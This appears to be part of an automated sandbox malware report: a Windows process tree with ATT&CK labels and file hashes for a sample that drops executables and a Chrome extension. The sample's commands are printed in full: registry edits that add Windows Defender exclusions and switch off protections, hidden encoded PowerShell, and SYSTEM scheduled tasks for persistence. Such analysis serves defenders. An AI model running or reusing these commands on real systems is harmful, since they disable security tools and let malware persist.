                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:1684
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:896
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBhKqCBnU" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1432
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HBhKqCBnU" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                              PID:1436
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JnYsKNtfKILCLnzmqvR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:1888
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JnYsKNtfKILCLnzmqvR" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2180
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPRcqRDwMNfU2" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2812
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPRcqRDwMNfU2" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2616
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcKuTnVJrgUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:2944
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcKuTnVJrgUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2676
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tLkEVSRtDsYzC" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2540
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tLkEVSRtDsYzC" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2648
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mRubDAwgBrMXtHVB" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:2940
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mRubDAwgBrMXtHVB" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                              PID:2816
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2848
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1928
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ueMSDBwpqNPMtOCdL" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2576
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ueMSDBwpqNPMtOCdL" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:824
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1508
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\CDACQYHYzIkxBFHu" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3028
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "gNupUYUpF" /SC once /ST 02:37:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:856
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /run /I /tn "gNupUYUpF"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1860
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gNupUYUpF"
                                                                    3⤵
                                                                      PID:2436
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1740
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                        4⤵
                                                                          PID:1728
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2820
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                          4⤵
                                                                            PID:2572
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "BKrBecnJFpviTncwu" /SC once /ST 07:13:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\CDACQYHYzIkxBFHu\gFwzmLTaIzVIguI\UulcwMW.exe\" yC /DZcQdidKi 525403 /S" /V1 /F
                                                                          3⤵
                                                                          • Drops file in Windows directory
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2852
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "BKrBecnJFpviTncwu"
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2928
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 280
                                                                          3⤵
                                                                          • Loads dropped DLL
                                                                          • Program crash
                                                                          PID:1016
                                                                      • C:\Windows\Temp\CDACQYHYzIkxBFHu\gFwzmLTaIzVIguI\UulcwMW.exe
                                                                        C:\Windows\Temp\CDACQYHYzIkxBFHu\gFwzmLTaIzVIguI\UulcwMW.exe yC /DZcQdidKi 525403 /S
                                                                        2⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Drops Chrome extension
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2120
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                          3⤵
                                                                            PID:2368
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              PID:2160
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1812
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  6⤵
                                                                                    PID:2520
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                4⤵
                                                                                • Indirect Command Execution
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2204
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                    PID:1700
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                      6⤵
                                                                                        PID:1672
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:968
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1668
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                          PID:1676
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                      4⤵
                                                                                      • Indirect Command Execution
                                                                                      PID:1656
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2508
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          6⤵
                                                                                            PID:2356
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                        4⤵
                                                                                        • Indirect Command Execution
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2332
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2200
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1492
                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                              7⤵
                                                                                                PID:2884
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bwlAqOXgugWiNjfDVs"
                                                                                        3⤵
                                                                                          PID:3016
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:760
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2492
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:940
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2908
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  7⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2444
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:2660
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2640
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2656
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                  7⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2696
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HBhKqCBnU\jQXRNE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTFwuPPkmIJnNiK" /V1 /F
                                                                                          3⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:896
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "qTFwuPPkmIJnNiK2" /F /xml "C:\Program Files (x86)\HBhKqCBnU\IBXMLpS.xml" /RU "SYSTEM"
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2632
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /END /TN "qTFwuPPkmIJnNiK"
                                                                                          3⤵
                                                                                            PID:320
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "qTFwuPPkmIJnNiK"
                                                                                            3⤵
                                                                                              PID:1736
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "RWJJsBeWTHYrFb" /F /xml "C:\Program Files (x86)\PPRcqRDwMNfU2\jTODRDA.xml" /RU "SYSTEM"
                                                                                              3⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:336
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "uLZqTVbmUsCwe2" /F /xml "C:\ProgramData\mRubDAwgBrMXtHVB\JPJZVCE.xml" /RU "SYSTEM"
                                                                                              3⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1692
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "dsfkAgsSAOiIQNOoG2" /F /xml "C:\Program Files (x86)\JnYsKNtfKILCLnzmqvR\mpxcwBH.xml" /RU "SYSTEM"
                                                                                              3⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1720
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "LfJoIyblvQWRVGdjqsN2" /F /xml "C:\Program Files (x86)\tLkEVSRtDsYzC\fMNEccA.xml" /RU "SYSTEM"
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:972
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "BwZcIZAXkNJDpgDxh" /SC once /ST 01:48:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\CDACQYHYzIkxBFHu\ULOrTxBt\nmHmEZb.dll\",#1 /QMuodidxzZ 525403" /V1 /F
                                                                                              3⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1436
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /run /I /tn "BwZcIZAXkNJDpgDxh"
                                                                                              3⤵
                                                                                                PID:2000
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "BKrBecnJFpviTncwu"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2620
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 1528
                                                                                                3⤵
                                                                                                • Loads dropped DLL
                                                                                                • Program crash
                                                                                                PID:888
                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\CDACQYHYzIkxBFHu\ULOrTxBt\nmHmEZb.dll",#1 /QMuodidxzZ 525403
                                                                                              2⤵
                                                                                                PID:2112
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\CDACQYHYzIkxBFHu\ULOrTxBt\nmHmEZb.dll",#1 /QMuodidxzZ 525403
                                                                                                  3⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in System32 directory
                                                                                                  • Enumerates system info in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2072
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "BwZcIZAXkNJDpgDxh"
                                                                                                    4⤵
                                                                                                      PID:3012
                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                taskeng.exe {36C9B881-FE5F-41B9-A920-B4C5F9A48E5B} S-1-5-21-1385883288-3042840365-2734249351-1000:RPXOCQRF\Admin:Interactive:[1]
                                                                                                1⤵
                                                                                                  PID:924
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                    2⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:568
                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      3⤵
                                                                                                        PID:788
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1928
                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        3⤵
                                                                                                          PID:592
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1648
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:2700
                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                        1⤵
                                                                                                          PID:2876
                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                          1⤵
                                                                                                            PID:2172
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:2764

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\HBhKqCBnU\IBXMLpS.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              168e07f3e31e1f129010330bb158c2fb

                                                                                                              SHA1

                                                                                                              b46613221f2e7ec939ccad548261533f160f8b80

                                                                                                              SHA256

                                                                                                              172b39e36887a65681e53b0db50b255c0be22b5f8b6dbd893ade6b0e7fad1d11

                                                                                                              SHA512

                                                                                                              4e940174a6c6e559ee9f6f1fad28cbaa4b9783039bd36c8ffc8539bad2baa26336c04892370767dabc26bedac47c9f36c2597cd515a1d32db593b1147b50b8a8

                                                                                                            • C:\Program Files (x86)\JnYsKNtfKILCLnzmqvR\mpxcwBH.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              97503a729707c3470b3d4703e396efc6

                                                                                                              SHA1

                                                                                                              42da3e1870b3433c81979def5e1801402ea5cfb5

                                                                                                              SHA256

                                                                                                              496fcab380249cfd22e7d39f6a598b001afb8990cf4a5d8abc84265ccc88d63d

                                                                                                              SHA512

                                                                                                              eed049466a124eea14663e55d0c631f6643d2ad94b0591400939bad934edd3fbbd889a8d7d9c3c9aecaaee3c0905a3d28575bd83b8683a482f315d399bd46b20

                                                                                                            • C:\Program Files (x86)\PPRcqRDwMNfU2\jTODRDA.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              6d99a732416a45fb3481757e1d77f093

                                                                                                              SHA1

                                                                                                              1e87410c1141bca90875c67b3308f442c99891af

                                                                                                              SHA256

